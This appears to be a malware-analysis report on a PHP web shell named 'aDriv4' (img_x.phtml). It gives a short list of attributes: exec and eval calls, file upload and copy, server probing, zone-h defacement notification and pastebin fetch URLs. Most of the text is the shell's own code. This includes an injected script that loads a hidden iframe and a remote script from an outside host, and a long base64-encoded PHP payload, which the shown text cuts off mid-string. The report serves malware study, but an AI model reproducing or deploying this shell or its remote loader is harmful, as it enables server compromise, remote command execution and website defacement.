PHP Malware Analysis
img_x.phtml
md5: 97bc617b18b7d00a523a90d485d08b76
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- aqpunk21@gmail.com (Deobfuscated, Traces)
- ndchax21@tznvy.pbz (Traces)
Encoding
- base64_decode (Deobfuscated, Original, Traces)
Environment
- error_reporting (Traces)
- getcwd (Deobfuscated, Traces)
- php_uname (Deobfuscated, Traces)
- set_time_limit (Traces)
Execution
- eval (Deobfuscated, Traces)
- exec (Deobfuscated, HTML, Original)
Files
- copy (Deobfuscated, Traces)
- file_get_contents (Deobfuscated, Traces)
Input
- _FILES (Deobfuscated, Traces)
- _GET (Deobfuscated, Traces)
- _POST (Deobfuscated, Traces)
Title
- aDriv4 (Original)
URLs
- http://$dj/ (Traces)
- http://$dj/$fi (Traces)
- http://$lnk (Traces)
- http://domains.yougetsignal.com/domains.php (Deobfuscated, Traces)
- http://fonts.gstatic.com/l/font?kit=3oir0CAJ0QJ5h5-A3AP8rRSrmRvs-bRaaQbSAUyiv7A&skey=a4ba60ff9fc73cf8&v=v8 (Deobfuscated, HTML, Traces)
- http://globe.moreforme.net (Deobfuscated, HTML, Original)
- http://globe.moreforme.net/l8/Layer8Servlet (HTML)
- http://localhost/uploads/img_x.phtml (Traces)
- http://pastebin.com/EpP671gK (Deobfuscated, Traces)
- http://pastebin.com/raw.php?i=XTUFfJLg (Deobfuscated, Traces)
- http://target.com/idx_config/user-config.txt (Deobfuscated, Traces)
- http://www.web-yang-udah-do-deface.com/filemu.php (Deobfuscated, Traces)
- http://www.zone-h.com/notify/single (Deobfuscated, Traces)
- http://www.zone-h.org/archive/notifier= (Deobfuscated)
- http://www.zone-h.org/archive/notifier=$nick (Traces)
- http://www.zone-h.org/archive/notifier=$nick/published=0 (Traces)
- https://fonts.googleapis.com/css?family=Ubuntu (Deobfuscated, HTML, Original)
- https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php (Deobfuscated, Traces)
Deobfuscated PHP code
<html>
<head><script>if(top==window){var layer8NameSpace="layer8ns";"undefined"==typeof window[layer8NameSpace]&&(window[layer8NameSpace]={}),window[layer8NameSpace].layer8Loader=function(){function e(e){return"undefined"!=typeof e&&null!==e}function t(){var t=document.createElement("script");t.setAttribute("src",s),t.setAttribute("id","fn_layer8_script"),t.setAttribute("async",""),(null==document.head||e(document.head))&&(document.head=document.getElementsByTagName("head")[0]),document.head.appendChild(t)}function n(){var t=r();if(e(t)){var n=t;i()&&(n=d(t));var o;try{o=document.documentElement,o.appendChild(n)}catch(c){o=document.body,o.appendChild(n)}a()}}function a(){function e(e){var n=e.data;"l8IframeIsReady"===n.message&&t()}window.addEventListener?window.addEventListener("message",e,!1):window.attachEvent("onmessage",e)}function r(){var t=document.createElement("iframe");if(e(t)){t.setAttribute("id","fn_layer8"),t.setAttribute("src",u),t.setAttribute("target","_blank"),t.setAttribute("frameborder","0");var n=/firefox/i.exec(navigator.userAgent);e(n)&&n.length>0?(t.style.height=0,t.style.width=0):t.style.display="none",t.frameBorder="no"}return t}function i(){var t=!1,n=/android (\d+)/i.exec(navigator.userAgent);return e(n)&&n.length>0&&(t=parseInt(n[1])>=4),t}function d(e){var t=document.createElement("div");return t.setAttribute("id","fn_wrapper_div"),t.style.position="fixed",t.style.display="none",t.ontouchstart=function(){return!0},t.appendChild(e),t}function o(){var t=void 0,a=this,r=function(){e(t)&&(window.clearTimeout(t),t=void 0,n.call(a))};t=window.setTimeout(r,1e4),"function"==typeof window.addEventListener?window.addEventListener("load",r,!1):window.attachEvent("onload",r)}var c="http://globe.moreforme.net",u=c+"/l8/Layer8Servlet",s=c+"/scripts/Anchor.js";o()};var layer8Loader=new window[layer8NameSpace].layer8Loader}</script>
<title>aDriv4</title>
<meta name='author' content='aDriv4'>
<meta charset="UTF-8">
<style type='text/css'>
@import url(https://fonts.googleapis.com/css?family=Ubuntu);
html {
background: black url("data:image/gif;base64,R0lGODlhMgAqAPMLABcXFyYmJjAwMB0dHSAgIBoaGhkZGRQUFCQkJBwcHAAAAP///wAAAAAAAAAAAAAAACH5BAQKAAAAIf4DRzQ0ACH/C05FVFNDQVBFMi4wAwEAAAAsAAAAADIAKgAABP5QyUmrvTjbk44sSCElycR5CoKY3Re6onJK6mQot0LoUynduZQNJ9nteEfgZDVS+FZMZ09Kmz6FQmbJhyXmjNMfsSr+8pDlJQsFiiUCAMksJRjIW4o27I5CCDSAgYKDhIWBNSNcc3oyeHMkE4yPXF1UXkVnSpdNmEljlpVcW1VaVKOcWU2iFFGWmmCbmpawslx+dk5wfHuNKI+6eS+9IwGGxsfIyRiTS1GQuylRc4vCc7WsFFyyUZqvmWOnoK2rtlaqpOeb4tlDQdxj3p45v3F0uG/1c7fQ1DEcygADCswgCc+zYDEKojg4DQ8jWp+4wIIYRBu8MbCgpLOkMZWUVYHpTnWkGAaNyWtpNsFSSKweI5a58jly2GqgzZvGGOJBNKwnT2bQeLr69C7HtnYlj5YM58wUR3OomLJL2aUbUaSolMYMWoffzq498XHFSbasoIMw9UVJu1ManlnfjF7tlFIrSo+npKL7uLEpyJMX3U0gqa5oS14N+4BlqxjXP7PHIgAAIfkEBQoACwAsAQABADAAKAAABP4wJUURUivrvdRJXChuikRNlHJRhmKErguXo3imajqBXEn3v1rGR6ykWq8ecsYTakoBgLN3mFqv2Kx2y918DpQCokD5VlYKMdmTALPdltSXtBQaYXVSjiV77mA7KReAQU97Pk0deSN3Sn16aEgJUWVtYWOVcAIDl2tmbxWbXaOkpVcqaHMhYllncpYlKJGPTwQYWIK3erI6hUODuI27RnxJJLatwoYTCJtlpiTNnG/Q1dbXCxMiJpknKGljrS03TLrLKbYErd/aQO3DRgjiveXlFOlZsJNTHtj+/wBXheuhxtsrNwXmGbNyoxgec4QS8Svyp8c7G4smfsuoCCIVWD4FoQDodIIStYAoU17BBCpWipAftLRUg8+dxxgLh/h4OC7dBXk2I9azSORnzWE8h9KhFeLTpJHgPEl00i1qBAAh+QQFCgALACwBAAEAMAAoAAAE/rCgsqq9OOudEVIEqCgGOSqJko3fSnCa8n1oPaarrGI6zIchU+m2u7CKFpBvyWw6n9CodErFHBKHW2okKWhP16zMd1yVhrXcVnhCwMq81BrHs9XWbg7ceD7RjXZ9e08KVxtdNwEAI2EsVY+QkU2NhVgsNJUxiCh/ZIKCOiNnLiJEoiR6ckR4figrM62rep8mR6cGpEGBJAkBMZSUCAIDjAmSx8jJVV1LCcZSQrlmta7Qcq9jcXadS6WjP0o8oM/K5ebn6BdrhiuUmx5Ib3a7uOKodS1MpvvX2uRJPfTNW/ONzz1A+ZR5qSTmnYB0ECNWKCbGWbwFMjBRskgozLiLIIMm0tNnQBWRHAkBzqlmBNadjyhBjnRiCYUiFsPMhYkAACH5BAUKAAsALAEAAQAwACgAAAT+MCW1ql0F3c2XUlonftOnlAqRcorRsiAlbqR5mgjITgmcz7SbCaUisFwGH3DJbDqf0Kh02vwcEodPpvBB/JhYEmqrRXAV14OLWmm5a5/iscVj31CoXOhyX9uRQyZyNEhpZWcIAmwdW4uOj5CRCgVVXjJObzcsRYE+JoBdQDUsep1BOTV5opo0nKOnn5l6UFmTj4mRubq7OyhpUDpUr3wqTF2XlaZ8s6tfmCrDFinIIzG8T3vX2tsbYWjehiDZ0uHhllZYfH7N1B6goDEfSHwTxtY0PKk4gT3S6zPH5rhwMzAewUQD0NUq5w0XC4a1EFrhRrGixYsYM+5KQQaEoosDZiIAADs=");
color: #ffffff;
font-family: 'Ubuntu';
font-size: 13px;
width: 100%;
}
li {
display: inline;
margin: 5px;
padding: 5px;
}
table, th, td {
border-collapse:collapse;
font-family: Tahoma, Geneva, sans-serif;
background: transparent;
font-family: 'Ubuntu';
font-size: 13px;
}
.table_home, .th_home, .td_home {
border: 1px solid #ffffff;
}
th {
padding: 10px;
}
a {
color: #ffffff;
text-decoration: none;
}
a:hover {
color: yellow;
text-decoration: underline;
}
b {
color: yellow;
}
input[type=text], input[type=password],input[type=submit] {
background: transparent;
color: #ffffff;
border: 1px solid #ffffff;
margin: 5px auto;
padding-left: 5px;
font-family: 'Ubuntu';
font-size: 13px;
}
textarea {
border: 1px solid #ffffff;
width: 100%;
height: 400px;
padding-left: 5px;
margin: 10px auto;
resize: none;
background: transparent;
color: #ffffff;
font-family: 'Ubuntu';
font-size: 13px;
}
</style>
</head>
<?php
$aDriv4 = '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